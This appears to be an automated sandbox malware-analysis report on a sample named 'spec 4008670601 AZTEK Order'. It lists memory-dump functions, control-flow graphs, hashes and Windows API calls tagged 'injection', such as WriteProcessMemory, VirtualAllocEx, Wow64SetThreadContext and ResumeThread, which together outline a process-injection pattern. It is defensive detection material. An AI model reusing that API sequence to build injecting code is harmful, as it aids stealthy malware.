                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 269 48820f9-48820fd 270 48820ff-4882172 269->270 271 4882086-4882088 269->271 282 488217b-48821a0 270->282 283 4882174-488217a 270->283 272 488208a-488209c 271->272 273 488209e-48820ad ReadProcessMemory 271->273 272->273 275 48820af-48820b5 273->275 276 48820b6-48820e6 273->276 275->276 283->282
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 048820A0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: c09a0fbc759b5b267fafb3813df6cf03e7146a1dcd30f6d69078efabaed70259
                                                      • Instruction ID: 6bd35a103b9fea638283f5819ebf74f99073b72030a9b2147a7c81906b85b43b
                                                      • Opcode Fuzzy Hash: c09a0fbc759b5b267fafb3813df6cf03e7146a1dcd30f6d69078efabaed70259
                                                      • Instruction Fuzzy Hash: ED317C72D003498FDB20EFAAC4447DEFBF0AF88324F24885AD555A7250C779A544CBA5
                                                      Function 04881F30 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 287 4881f30-4881f7e 289 4881f8e-4881fcd WriteProcessMemory 287->289 290 4881f80-4881f8c 287->290 293 4881fcf-4881fd5 289->293 294 4881fd6-4882006 289->294 290->289 293->294
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04881FC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 4d6de2823e3b327710477e8d1e256af676766a5a70ee2952b66707da703b708e
                                                      • Instruction ID: e8729365b70b725159798c98fc020ce11815738c60edb7859a531ada3ca388e6
                                                      • Opcode Fuzzy Hash: 4d6de2823e3b327710477e8d1e256af676766a5a70ee2952b66707da703b708e
                                                      • Instruction Fuzzy Hash: 162127719003499FDF10DFAAC885BDEBBF5FF48310F10882AE919A7241D778A954CBA5
                                                      Function 04881F2C Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 298 4881f2c-4881f7e 300 4881f8e-4881fcd WriteProcessMemory 298->300 301 4881f80-4881f8c 298->301 304 4881fcf-4881fd5 300->304 305 4881fd6-4882006 300->305 301->300 304->305
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04881FC0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: a8abb7a45eda8432199a1fc734d5e437ebe10002a84a1c99448b76e9181d9537
                                                      • Instruction ID: 5ff8eacb18205efdd46fcfa6b2f3cf0cc438c2140e35db47ee32aed0012bfe71
                                                      • Opcode Fuzzy Hash: a8abb7a45eda8432199a1fc734d5e437ebe10002a84a1c99448b76e9181d9537
                                                      • Instruction Fuzzy Hash: 562137759003498FDB10DFA9C8817EEBBF1FF48310F10842AE919A7241DB789550CB94
                                                      Function 00B9B790 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 309 b9b790-b9d714 DuplicateHandle 311 b9d71d-b9d73a 309->311 312 b9d716-b9d71c 309->312 312->311
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B9D646,?,?,?,?,?), ref: 00B9D707
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114749629.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b90000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 7b3b0aa8b0f9eb63f8a10998c0162f86d6faa735cef9a5a24e91a5756a678d97
                                                      • Instruction ID: 6a1ace74802c9ba3aa71d828261cce0abb424b6423e876e17e7291b5e1c03e4b
                                                      • Opcode Fuzzy Hash: 7b3b0aa8b0f9eb63f8a10998c0162f86d6faa735cef9a5a24e91a5756a678d97
                                                      • Instruction Fuzzy Hash: E521E5B5900249DFDB10CF9AD584AEEFBF4EB48310F14845AE919A3350D378A950CFA4
                                                      Function 04881528 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 315 4881528-4881573 317 4881583-48815b3 Wow64SetThreadContext 315->317 318 4881575-4881581 315->318 320 48815bc-48815ec 317->320 321 48815b5-48815bb 317->321 318->317 321->320
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 048815A6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 20f5dd2f8722cebd0a4291fd94cfe30362eb1b70302a7dc06d521829d5c2e1cb
                                                      • Instruction ID: 8d4a88db81ae2d67e82d89fc056cd0b0852f9ef19db63741c6222bbff49185d0
                                                      • Opcode Fuzzy Hash: 20f5dd2f8722cebd0a4291fd94cfe30362eb1b70302a7dc06d521829d5c2e1cb
                                                      • Instruction Fuzzy Hash: 09211871D003098FDB10DFAAC4857AEBBF4EF88324F14842ED559A7240DB78A945CFA5
                                                      Function 04882020 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 325 4882020-48820ad ReadProcessMemory 328 48820af-48820b5 325->328 329 48820b6-48820e6 325->329 328->329
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 048820A0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: d5c9373278c91e1fd6e62935c2f83128f9693001ce62389405b6e70ee57822e9
                                                      • Instruction ID: 526437d7174851beb6571a83d29a8fde7b69bb4a2259196d833a2a3169ba92b4
                                                      • Opcode Fuzzy Hash: d5c9373278c91e1fd6e62935c2f83128f9693001ce62389405b6e70ee57822e9
                                                      • Instruction Fuzzy Hash: B92116B18003499FDB10DFAAC881ADEFBF5FF48310F10842AE919A7240C779A550CBA5
                                                      Function 00B9D678 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 333 b9d678-b9d714 DuplicateHandle 334 b9d71d-b9d73a 333->334 335 b9d716-b9d71c 333->335 335->334
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B9D646,?,?,?,?,?), ref: 00B9D707
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114749629.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b90000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 4cf504b407fc732a78dc2273c22f67eb183d40366e8609c936bb2a4d127ec44b
                                                      • Instruction ID: efb6b5b0c05adfefed14f355ef62d144420470ed4027111ae50f3f44b773213a
                                                      • Opcode Fuzzy Hash: 4cf504b407fc732a78dc2273c22f67eb183d40366e8609c936bb2a4d127ec44b
                                                      • Instruction Fuzzy Hash: 7821E0B5900249DFDB00CFAAD580ADEBBF5FB48324F24842AE919A3350D378A950CF64
                                                      Function 04881470 Relevance: 1.6, APIs: 1, Instructions: 58threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 4d316c9ac1ae03701839cf8bfbd09d0dbffab03a83e83be6c6ed1ffd14746132
                                                      • Instruction ID: d425b4b37244a2293da2ce7365d08397481f53cb791701c2fbde465c0d5b4aa3
                                                      • Opcode Fuzzy Hash: 4d316c9ac1ae03701839cf8bfbd09d0dbffab03a83e83be6c6ed1ffd14746132
                                                      • Instruction Fuzzy Hash: 161159B1D002498FDB10DFAAD4457AEFBF5EF88720F20845AD919A7300DB75A901CB95
                                                      Function 00B9A168 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B9B079,00000800,00000000,00000000), ref: 00B9B28A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114749629.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b90000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 39527bd601b531b17bd923a1ad526506a0ab4eca7130807a6a25a65340bdcf32
                                                      • Instruction ID: 8eff7c7f4b520b3aa0540bcdd9b673f440d337c6b4ae163e0e965b804437b716
                                                      • Opcode Fuzzy Hash: 39527bd601b531b17bd923a1ad526506a0ab4eca7130807a6a25a65340bdcf32
                                                      • Instruction Fuzzy Hash: 331114B6800349DFDB10CF9AD584B9EFBF4EB48710F10846EE519A7200C3B5A945CFA4
                                                      Function 00B9B219 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B9B079,00000800,00000000,00000000), ref: 00B9B28A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114749629.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b90000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 6772169694f7e15e4d1ab4e167bb076ac0d6d1093a87247341212273f4fdafbb
                                                      • Instruction ID: 7a57ea44198bc56fbb3436d421579edd0fe05c36cc94b67f1ad75bb8f8bdcc62
                                                      • Opcode Fuzzy Hash: 6772169694f7e15e4d1ab4e167bb076ac0d6d1093a87247341212273f4fdafbb
                                                      • Instruction Fuzzy Hash: 321100B68043498FDB10CFAAD544ADEFFF4EB88720F14846AD959A7200C3B5A545CFA4
                                                      Function 04881A38 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04881AA6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 26292516928d6b1130eddd4425ddab4236414589a1055dd3423a301f66a49505
                                                      • Instruction ID: 4b7bf340dcc119987afb831d42acc114257ba0a23d5228c826f172475b8eb3b8
                                                      • Opcode Fuzzy Hash: 26292516928d6b1130eddd4425ddab4236414589a1055dd3423a301f66a49505
                                                      • Instruction Fuzzy Hash: 111126729002499FDB10DFAAC845BDFBBF5EF88320F148819E519A7250CB75A950CBA5
                                                      Function 04881478 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 65eca666c2d32617c2bd761a3b7a64e145b5598e012a94801920564b6fa00bb4
                                                      • Instruction ID: 47c74e98950d00f2a92188606479d8435e61a6d5d4d2e278b5f9412d2f6d02c8
                                                      • Opcode Fuzzy Hash: 65eca666c2d32617c2bd761a3b7a64e145b5598e012a94801920564b6fa00bb4
                                                      • Instruction Fuzzy Hash: 02116AB19003498FDB10DFAAC44579FFBF5EF88324F20841DD519A7240CB75A540CB95
                                                      Function 00B9AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00B9AFFE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114749629.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b90000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 3f9499d419b89617d1834b9015bc26759fde9b727324d732c79553c1c8194c78
                                                      • Instruction ID: 6c35b6b4fe9c6ced62d48f188dcc3f7a8d7a47422cb3274c528caad2cc00ef71
                                                      • Opcode Fuzzy Hash: 3f9499d419b89617d1834b9015bc26759fde9b727324d732c79553c1c8194c78
                                                      • Instruction Fuzzy Hash: EF110FB6C006498FDB10CF9AD544B9EFBF4EB88324F10846AD829A7210D3B9A545CFA1
                                                      Function 048847E0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 04884F65
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: 131e78a91ab4b0aabe6036b6c6131b3730971c50b685c74df24870338a7b7e3a
                                                      • Instruction ID: b672a47e518b13b72f43ffd141e9fe08dba261af53f86c99c659753674e9837f
                                                      • Opcode Fuzzy Hash: 131e78a91ab4b0aabe6036b6c6131b3730971c50b685c74df24870338a7b7e3a
                                                      • Instruction Fuzzy Hash: B21113B58003499FDB10DF9AC484BDEBBF8EB48724F108419E915A3201D3B5B944CFA5
                                                      Function 04884F00 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 04884F65
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2124400949.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4880000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: f1fc3beea792d26f889c718b9ab5c453f981e04ca190181f3594293845c29c6c
                                                      • Instruction ID: 9c7e3d34890cfdff8212870a1cbfcbcaa274d021a336c9f9701290c3e0543343
                                                      • Opcode Fuzzy Hash: f1fc3beea792d26f889c718b9ab5c453f981e04ca190181f3594293845c29c6c
                                                      • Instruction Fuzzy Hash: 2111F2B58007499FDB10DF9AC485BDEFBF4FB48724F20885AE919A7200D3B9A544CFA1
                                                      Function 06DAF788 Relevance: .4, Instructions: 360COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bddb391d8bd368489e8792e000d8db6812a6270d1cf74452b5d4886aad7cf1ff
                                                      • Instruction ID: 3227b42180dc8d301ec57de87d7ee6acebf578467d925635ec843caf0d11832b
                                                      • Opcode Fuzzy Hash: bddb391d8bd368489e8792e000d8db6812a6270d1cf74452b5d4886aad7cf1ff
                                                      • Instruction Fuzzy Hash: 56E14D34E04209DFDB45EBF8D844AAEBFB3EB88310F109099E905A7396CB75AD41CB51
                                                      Function 06DA279F Relevance: .3, Instructions: 294COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70352dc93d97f741cc1cc9238d7bdf34aca11faaf63220b34f60f2d2deaba7a9
                                                      • Instruction ID: a1a36de0c8e6df5fead5673a73f2847f0a1db6cb92dcbfa8fc76bd73cf2d40a2
                                                      • Opcode Fuzzy Hash: 70352dc93d97f741cc1cc9238d7bdf34aca11faaf63220b34f60f2d2deaba7a9
                                                      • Instruction Fuzzy Hash: FAB18F346147008FC759DF38D89499ABBF6FF8A304B1489ADD0968B361DF70AD46CB90
                                                      Function 06DA2E15 Relevance: .3, Instructions: 253COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6852c2982b251169b98a24d6fdc2ef10215ffe376bee012b6382619063ca06fa
                                                      • Instruction ID: 38351a5495a351acedcbe7814a46e7e3d9e8cc7fd365ad37b462634f1fd8eb28
                                                      • Opcode Fuzzy Hash: 6852c2982b251169b98a24d6fdc2ef10215ffe376bee012b6382619063ca06fa
                                                      • Instruction Fuzzy Hash: 73A160342147008FC759EF38D89499ABBF6FF89304B5489ADD09A8B361DF71AD45CB90
                                                      Function 06DA2E57 Relevance: .2, Instructions: 242COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1839372f40e8f67254af3272b414ac160500b2ee7848071d4119ff6b46794c1
                                                      • Instruction ID: c174c08e404d50030a6e1be88310de87a7365afb63cb786ef2c1cd674f611283
                                                      • Opcode Fuzzy Hash: b1839372f40e8f67254af3272b414ac160500b2ee7848071d4119ff6b46794c1
                                                      • Instruction Fuzzy Hash: 4B915D342107008FC759EF38D894A9ABBF6EF89305F1485ADD09A8B361DF71AD46CB90
                                                      Function 06DA3528 Relevance: .2, Instructions: 231COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0262a861ec9ac342cf706184744b63f5197d66321c4f5df6e81b609d820967a2
                                                      • Instruction ID: d35454950a1f542ad7bde2ecc0935745fc740b9ccdf76fa50ffa98fcbee98c4d
                                                      • Opcode Fuzzy Hash: 0262a861ec9ac342cf706184744b63f5197d66321c4f5df6e81b609d820967a2
                                                      • Instruction Fuzzy Hash: D0915175A002199FCB05DFA8D5809EEBBF6FF89300B1580AAE805EB351E735DD16CB91
                                                      Function 06DA2EB0 Relevance: .2, Instructions: 196COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2ee77ef9a5abaf5e4f433b2d5a88294ef99fad24e5133f80c97a629b91dbe2ba
                                                      • Instruction ID: e0117426cae8aaf8e7e7782cada310db8308ae5ebf5a5cf0d431adf0109dfab9
                                                      • Opcode Fuzzy Hash: 2ee77ef9a5abaf5e4f433b2d5a88294ef99fad24e5133f80c97a629b91dbe2ba
                                                      • Instruction Fuzzy Hash: 66812D34210A008FC749EB38D494A9EBBF6FF89301F5485ADD55A8B361DF71AD46CB90
                                                      Function 06DA3B04 Relevance: .2, Instructions: 152COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 150cb54f4a02978d5c90f120b71f0e897ac6eb14cb998c9f35b66e542dbf1cd4
                                                      • Instruction ID: a4d9faf6539f696a9f3006eb02932bc1da719e0c44d115926922fe100bac2bf8
                                                      • Opcode Fuzzy Hash: 150cb54f4a02978d5c90f120b71f0e897ac6eb14cb998c9f35b66e542dbf1cd4
                                                      • Instruction Fuzzy Hash: D0419B31B002158FCB04DF7998489AEBBF7EFC8720B258529E429D7395EB309D058790
                                                      Function 06DA3F41 Relevance: .1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f20d0bf60caf35063f31e7735ca6e7cf656d7bb459711637ecdfe95387bdd16a
                                                      • Instruction ID: 8160c885f1e725fd4ad9e7a430853c0d6f3a4129d09c281623c456864b0191c0
                                                      • Opcode Fuzzy Hash: f20d0bf60caf35063f31e7735ca6e7cf656d7bb459711637ecdfe95387bdd16a
                                                      • Instruction Fuzzy Hash: 39518E34B142049FDB489BB5D869B6E7AF3BFC8700F248069E906EB396DE75DC018B50
                                                      Function 06DA3F7B Relevance: .1, Instructions: 136COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a77bbe788d3d33c502b3ae918483838aaf449a419338391e86a42dc62d9379e
                                                      • Instruction ID: 3a07d238490a54255bcdeaa7d723ce9ea172f7bd26ce591a398c5427433ae4a7
                                                      • Opcode Fuzzy Hash: 2a77bbe788d3d33c502b3ae918483838aaf449a419338391e86a42dc62d9379e
                                                      • Instruction Fuzzy Hash: CA418E34B142049FDB489B75D859B6EBAF3BFC8700F218069E906EB396DE75DC018B50
                                                      Function 06DA4C87 Relevance: .1, Instructions: 135COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 697030a3643837403aea096bdae0af37c796f3535afbd7ee202709d110dd4dd7
                                                      • Instruction ID: 4c68771c2eb5f91d64abd79a98c18366548e815215e2b8de1622b21b1e3510c3
                                                      • Opcode Fuzzy Hash: 697030a3643837403aea096bdae0af37c796f3535afbd7ee202709d110dd4dd7
                                                      • Instruction Fuzzy Hash: 3C51B0B4909284CFC706CB69E554A58BFF0AF8A300B2A84C6D484DB2B3CB75AD55CB12
                                                      Function 06DABE48 Relevance: .1, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 305a0ec6d05b7e6a13b9e7310c883a3e960835b244f3bba5a16c6a64bde7342d
                                                      • Instruction ID: c6258276b1c9c516eb1fa7ad7ca9735428eb3de3aa28dd6366fa6d105b54cf04
                                                      • Opcode Fuzzy Hash: 305a0ec6d05b7e6a13b9e7310c883a3e960835b244f3bba5a16c6a64bde7342d
                                                      • Instruction Fuzzy Hash: 9741F575E08208CFDB44CB99D484AEDBBF5FB89300F1495AAD919A7251C731AE42CFA0
                                                      Function 06DABB00 Relevance: .1, Instructions: 126COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ffec1ff0a22634f982610fe099b8f1f66f9f771611bb2e62105766cbcaf6708f
                                                      • Instruction ID: 5e61ba349a85fa6721fe3376dd84d0ced391ca3333ac2d431a2e681e8f8ce9ea
                                                      • Opcode Fuzzy Hash: ffec1ff0a22634f982610fe099b8f1f66f9f771611bb2e62105766cbcaf6708f
                                                      • Instruction Fuzzy Hash: 3B412974D082088FEB44CFAAD4856AEFBF6BF8C300F14D22AD459A7255DB348942CB94
                                                      Function 06DADE80 Relevance: .1, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
